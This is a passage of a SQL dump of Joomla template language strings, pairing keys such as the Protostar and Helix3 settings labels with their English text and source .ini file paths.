description','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.ini'),(3613,'TPL_BEEZ3_POSITION_DEBUG','Debug','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3614,'TPL_BEEZ3_POSITION_POSITION-0','Search','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3615,'TPL_BEEZ3_POSITION_POSITION-10','Footer middle','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3616,'TPL_BEEZ3_POSITION_POSITION-11','Footer bottom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3617,'TPL_BEEZ3_POSITION_POSITION-12','Middle top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3618,'TPL_BEEZ3_POSITION_POSITION-13','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3619,'TPL_BEEZ3_POSITION_POSITION-14','Footer last','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3620,'TPL_BEEZ3_POSITION_POSITION-15','Header','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3621,'TPL_BEEZ3_POSITION_POSITION-1','Top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3622,'TPL_BEEZ3_POSITION_POSITION-2','Breadcrumbs','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3623,'TPL_BEEZ3_POSITION_POSITION-3','Right bottom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3624,'TPL_BEEZ3_POSITION_POSITION-4','Left middle','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3625,'TPL_BEEZ3_POSITION_POSITION-5','Left bottom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3626,'TPL_BEEZ3_POSITION_POSITION-6','Right top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3627,'TPL_BEEZ3_POSITION_POSITION-7','Left top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3628,'TPL_BEEZ3_POSITION_POSITION-8','Right middle','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3629,'TPL_BEEZ3_POSITION_POSITION-9','Footer top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3630,'TPL_BEEZ3_XML_DESCRIPTION','Accessible site template for Joomla! 3.x. Beez3, the HTML5 version.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_beez3.sys.ini'),(3631,'TPL_PROTOSTAR_BACKGROUND_COLOR_DESC','Choose a background colour for static layouts. If left blank the Default (#f4f6f7) is used.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3632,'TPL_PROTOSTAR_BACKGROUND_COLOR_LABEL','Background Colour','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3633,'TPL_PROTOSTAR_BACKTOTOP','Back to Top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3634,'TPL_PROTOSTAR_COLOR_DESC','Choose an overall colour for the site template. If left blank the Default (#0088cc) is used.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3635,'TPL_PROTOSTAR_COLOR_LABEL','Template Colour','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3636,'TPL_PROTOSTAR_FLUID_DESC','Use Bootstrap\'s Fluid or Static Container (both are Responsive).','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3637,'TPL_PROTOSTAR_FLUID_LABEL','Fluid Layout','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3638,'TPL_PROTOSTAR_FLUID','Fluid','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3639,'TPL_PROTOSTAR_FONT_DESC','Load a Google font for the headings (H1, H2, H3, etc).','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3640,'TPL_PROTOSTAR_FONT_LABEL','Google Font for Headings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3641,'TPL_PROTOSTAR_FONT_NAME_DESC','Example: Open+Sans or Source+Sans+Pro.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3642,'TPL_PROTOSTAR_FONT_NAME_LABEL','Google Font Name','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3643,'TPL_PROTOSTAR_LOGO_DESC','Select or upload a custom logo for the site template.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3644,'TPL_PROTOSTAR_LOGO_LABEL','Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3645,'TPL_PROTOSTAR_STATIC','Static','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3646,'TPL_PROTOSTAR_TOGGLE_MENU','Toggle Navigation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3647,'TPL_PROTOSTAR_XML_DESCRIPTION','Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI).','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.ini'),(3648,'TPL_PROTOSTAR_POSITION_BANNER','Banner','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3649,'TPL_PROTOSTAR_POSITION_DEBUG','Debug','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3650,'TPL_PROTOSTAR_POSITION_POSITION-0','Search','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3651,'TPL_PROTOSTAR_POSITION_POSITION-10','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3652,'TPL_PROTOSTAR_POSITION_POSITION-11','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3653,'TPL_PROTOSTAR_POSITION_POSITION-12','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3654,'TPL_PROTOSTAR_POSITION_POSITION-13','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3655,'TPL_PROTOSTAR_POSITION_POSITION-14','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3656,'TPL_PROTOSTAR_POSITION_POSITION-15','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3657,'TPL_PROTOSTAR_POSITION_POSITION-1','Navigation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3658,'TPL_PROTOSTAR_POSITION_POSITION-2','Breadcrumbs','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3659,'TPL_PROTOSTAR_POSITION_POSITION-3','Top centre','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3660,'TPL_PROTOSTAR_POSITION_POSITION-4','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3661,'TPL_PROTOSTAR_POSITION_POSITION-5','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3662,'TPL_PROTOSTAR_POSITION_POSITION-6','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3663,'TPL_PROTOSTAR_POSITION_POSITION-7','Right','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3664,'TPL_PROTOSTAR_POSITION_POSITION-8','Left','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3665,'TPL_PROTOSTAR_POSITION_POSITION-9','Unused','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3666,'TPL_PROTOSTAR_POSITION_FOOTER','Footer','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3667,'TPL_PROTOSTAR_XML_DESCRIPTION','Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI).','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_protostar.sys.ini'),(3668,'HELIX_YES','Yes','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3669,'HELIX_NO','No','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3670,'HELIX_SHOW','Show','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3671,'HELIX_HIDE','Hide','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3672,'JDETAILS','<i class=\'fa fa-home\'></i>Basic','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3673,'HELIX_GLOBAL','Global','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3674,'HELIX_PRELOADER','Preloader','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3675,'HELIX_PRELOADER_DESC','Yes to enable preloader','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3676,'HELIX_PRELOADER_ANIMATION','Preloader Animation','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3677,'HELIX_PRELOADER_ANIMATION_DESC','Select a preloader animation from the list','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3678,'HELIX_PRELOADER_ANIMATION_CIRCLE','Circle','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3679,'HELIX_PRELOADER_ANIMATION_DOUBLE_LOOP','Double Loop','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3680,'HELIX_PRELOADER_ANIMATION_RING','Ring','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3681,'HELIX_PRELOADER_ANIMATION_AUDIO_WAVE','Audio Wave','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3682,'HELIX_PRELOADER_ANIMATION_WAVE_TWO','Wave Two','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3683,'HELIX_PRELOADER_ANIMATION_CIRCLE_TWO','Circle Two','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3684,'HELIX_PRELOADER_ANIMATION_MOON','Moon','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3685,'HELIX_PRELOADER_ANIMATION_CLOCK','Clock','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3686,'HELIX_PRELOADER_ANIMATION_LOGO','Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3687,'HELIX_PRELOADER_BG_COLOR','Preloader Background color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3688,'HELIX_PRELOADER_BG_COLOR_DESC','Select a background color for preloader','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3689,'HELIX_PRELOADER_TX_COLOR','Preloader Text Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3690,'HELIX_PRELOADER_TX_COLOR_DESC','Select a text color for preloader','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3691,'HELIX_GOTO_TOP','Go To Top','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3692,'HELIX_GO_TOP_DESC','Yes to show go to top when scroll in bottom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3693,'HELIX_HEADER','Header','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3694,'HELIX_STICKY_HEADER','Sticky Header','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3695,'HELIX_STICKY_HEADER_DESC','Enable to get the header content area to stay visible at the top of the screen as you scroll through that content. Header tend to contain navigation and this may improve UX of website.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3696,'HELIX_FAVICON','Favicon','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3697,'HELIX_FAVICON_DESC','Upload a 16px x 16px .png or .gif image that will be your favicon.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3698,'HELIX_LOGO','Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3699,'HELIX_LOGO_TYPE','Logo Type','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3700,'HELIX_LOGO_TYPE_DESC','Select logo type from the list.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3701,'HELIX_LOGO_TYPE_IMAGE','Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3702,'HELIX_LOGO_TYPE_IMAGE_DESC','Select/upload logo image for non retina device.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3703,'HELIX_LOGO_TYPE_IMAGE_RETINA','Retina Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3704,'HELIX_LOGO_TYPE_IMAGE_RETINA_DESC','Upload a double size of your logo to keep look great of higher resulationary devices like retina or 5k display.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3705,'HELIX_LOGO_TYPE_TEXT','Text','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3706,'HELIX_LOGO_TYPE_TEXT_DESC','Enter logo text.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3707,'HELIX_LOGO_SLOGAN','Logo Slogan','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3708,'HELIX_LOGO_SLOGAN_DESC','Enter slogan text.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3709,'HELIX_MODULE_POSITIONS','Module Position','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3710,'HELIX_MODULE_POSITIONS_DESC','Select a suitable module position where you want to display this feature.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3711,'HELIX_MOBILE_LOGO','Mobile Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3712,'HELIX_FEATURE_LOAD_POS','Feature Load Position','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3713,'HELIX_FEATURE_LOAD_POS_DESC','if your selected module position (for feature) has also module then it will works. This is specially where you want to show this feature, before module or after module','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3714,'HELIX_FEATURE_LOAD_POS_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3715,'HELIX_FEATURE_LOAD_POS_BEFORE','Before Module','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3716,'HELIX_FEATURE_LOAD_POS_AFTER','After Module','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3717,'HELIX_MOBILE_LOGO_DESC','This logo will be shown in mobile view instead of default logo. Leave blank if you do not want to show different logo for mobile devices.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3718,'HELIX_BOXED_LAYOUT','Boxed Layout','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3719,'HELIX_ENABLE_BOXED_LAYOUT','Enable','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3720,'HELIX_ENABLE_BOXED_LAYOUT_DESC','Enable this option for boxed layout.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3721,'HELIX_FOOTER','Footer','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3722,'HELIX_COPYRIGHT','Copyright','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3723,'HELIX_COPYRIGHT_DESC','Show or hide copyright information.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3724,'HELIX_COMPYRIGHT_TEXT','Copyright Notice','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3725,'HELIX_COMPYRIGHT_TEXT_DESC','The Copyright Notice should contain any necessary copyright notice for claiming the intellectual property, and should identify the current owner(s) of the copyright for the content. All HTML tags are allowed.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3726,'HELIX_SOCIAL_ICONS','Social Icons','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3727,'HELIX_SOCIAL_ICONS_DESC','Enable this option to show social icons.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3728,'HELIX_SOCIAL_ICON_FACEBOOK','Facebook URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3729,'HELIX_SOCIAL_ICON_FACEBOOK_DESC','Input the full URL to your Facebook profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3730,'HELIX_SOCIAL_ICON_TWITTER','Twitter URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3731,'HELIX_SOCIAL_ICON_TWITTER_DESC','Input the full URL to your Twitter profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3732,'HELIX_SOCIAL_ICON_GOOGLEPLUS','Google Plus URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3733,'HELIX_SOCIAL_ICON_GOOGLEPLUS_DESC','Input the full URL to your Google+ profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3734,'HELIX_SOCIAL_ICON_PINTEREST','Pinterest URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3735,'HELIX_SOCIAL_ICON_PINTEREST_DESC','Input the full URL to your Pinterest profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3736,'HELIX_SOCIAL_ICON_LINKEDIN','Linkedin URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3737,'HELIX_SOCIAL_ICON_LINKEDIN_DESC','Input the full URL to your Linkedin profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3738,'HELIX_SOCIAL_ICON_DRIBBBLE','Dribbble URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3739,'HELIX_SOCIAL_ICON_DRIBBBLE_DESC','Input the full URL to your Dribbble profile page. ','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3740,'HELIX_SOCIAL_ICON_BEHANCE','Behance URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3741,'HELIX_SOCIAL_ICON_BEHANCE_DESC','Input the full URL to your Behance profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3742,'HELIX_SOCIAL_ICON_YOUTUBE','YouTube URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3743,'HELIX_SOCIAL_ICON_YOUTUBE_DESC','Input the full URL to your YouTube profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3744,'HELIX_SOCIAL_ICON_FLICKR','Flickr URL','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3745,'HELIX_SOCIAL_ICON_FLICKR_DESC','Input the full URL to your Flickr profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3746,'HELIX_SOCIAL_ICON_SKYPE','Skype Username','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3747,'HELIX_SOCIAL_ICON_SKYPE_DESC','Input your Skype Name, a unique user name that is used to sign in to Skype.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3748,'HELIX_SOCIAL_ICON_WHATSAPP','WhatsApp Username','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3749,'HELIX_SOCIAL_ICON_WHATSAPP_DESC','Input your WhatsApp username','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3750,'HELIX_SOCIAL_ICON_VK','VK Username','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3751,'HELIX_SOCIAL_ICON_VK_DESC','Input the full URL to your VK profile page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3752,'HELIX_SOCIAL_ICON_CUSTOM','Custom','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3753,'HELIX_SOCIAL_ICON_CUSTOM_DESC','Insert your custom url with fontawesome icon, eg. fa-facebook http://joomshaper.com','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3754,'HELIX_CONTACT_INFO','Contact Information','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3755,'HELIX_ENABLE_CONTACT_INFO','Enable','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3756,'HELIX_ENABLE_CONTACT_INFO_DESC','Enable this option to show contact information.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3757,'HELIX_CONTACT_PHONE','Phone','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3758,'HELIX_CONTACT_PHONE_DESC','Add phone number here. Leave blank if no phone is required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3759,'HELIX_CONTACT_MOBILE','Mobile','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3760,'HELIX_CONTACT_MOBILE_DESC','Add mobile number here. Leave blank if no phone is required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3761,'HELIX_CONTACT_EMAIL','Email','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3762,'HELIX_CONTACT_EMAIL_DESC','Add email address here. Leave blank if no email is required.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3763,'HELIX_CONTACT_OPEN_HOURS','Open Hours','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3764,'HELIX_CONTACT_OPEN_HOURS_DESC','Insert your open hours here. eg. Mon - Fri 8:00 - 17:30','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3765,'HELIX_COMINGOON','Coming Soon','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3766,'HELIX_COMINGSOON_MODE','Coming Soon Mode','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3767,'HELIX_COMINGSOON_BG','Coming Soon Background','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3768,'HELIX_COMINGSOON_BG_DESC','Select a Coming Soon Background image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3769,'HELIX_COMINGSOON_LOGO','Coming Soon Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3770,'HELIX_COMINGSOON_LOGO_DESC','Select a Coming Soon logo, if leave it blank then will get template logo.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3771,'HELIX_COMINGSOON_MODE_DESC','Helix v3 introduces a Coming Soon page which allows you to display a stylish page indicating that your site is either being worked on or under construction','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3772,'HELIX_COMINGSOON_TITLE','Coming Soon Title','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3773,'HELIX_COMINGSOON_TITLE_DESC','Write a headline for your Coming soon page.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3774,'HELIX_COMINGSOON_DATE','Date','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3775,'HELIX_COMINGSOON_DATE_DESC','Insert date used for Countdown timer','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3776,'HELIX_COMINGSOON_CONTENT','Content','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3777,'HELIX_COMINGSOON_CONTENT_DESC','Description field so you can let visitors know what’s coming. Tip: Add also contact info.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3778,'HELIX_ERRORPAGE','Error Page','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3779,'HELIX_ERRORPAGE_BG','Backgound Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3780,'HELIX_ERRORPAGE_BG_DESC','Select a Error Page Background image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3781,'HELIX_ERRORPAGE_LOGO','Error Page Logo','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3782,'HELIX_ERRORPAGE_LOGO_DESC','Select a Error Page logo, if leave it blank then will get template logo.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3783,'COM_TEMPLATES_PRESET_FIELDSET_LABEL','<i class=\'fa fa-paint-brush\'></i>Presets','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3784,'HELIX_PRESETS','Preset Styles','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3785,'HELIX_STYLEING_OPTIONS','Styling Options','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3786,'HELIX_BODY_BACKGROUND_IMAGE_LABEL','Body Background Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3787,'HELIX_BODY_BACKGROUND_IMAGE','Select Image','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3788,'HELIX_BODY_BACKGROUND_IMAGE_DESC','Select image which will be used as the background. To remove a background image, simply delete the URL from the settings field.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3789,'HELIX_BACKGROUND_COLOR','Background Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3790,'HELIX_BACKGROUND_COLOR_DESC','Define a background solid color that will show behind the image.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3791,'HELIX_TEXT_COLOR','Text Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3792,'HELIX_TEXT_COLOR_DESC','The color attribute specifies the main color of the text.','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3793,'HELIX_MAJOR_COLOR','Major Color','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3794,'HELIX_MAJOR_COLOR_DESC','Major color setting based on chosen Preset','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3795,'COM_TEMPLATES_LAYOUT_FIELDSET_LABEL','<i class=\'fa fa-list-alt\'></i>Layout','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3796,'HELIX_SAVE_COPY','Save as Copy','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3797,'HELIX_DELETE','Delete','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3798,'HELIX_ENTER_LAYOUT_NAME','Enter Layout Name','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3799,'HELIX_APPLY','Apply','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3800,'HELIX_CANCEL','Cancel','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3801,'HELIX_ARRANGE_ROWS','Arrange Rows','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3802,'HELIX_ADD_ROW','Add Row','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3803,'HELIX_ROW_SETTINGS','Row Settings','/home/smthsmth/public_html/language/en-GB/en-GB.tpl_shaper_helix3.ini'),(3804,'HELIX_REMOVE_ROW','Remove 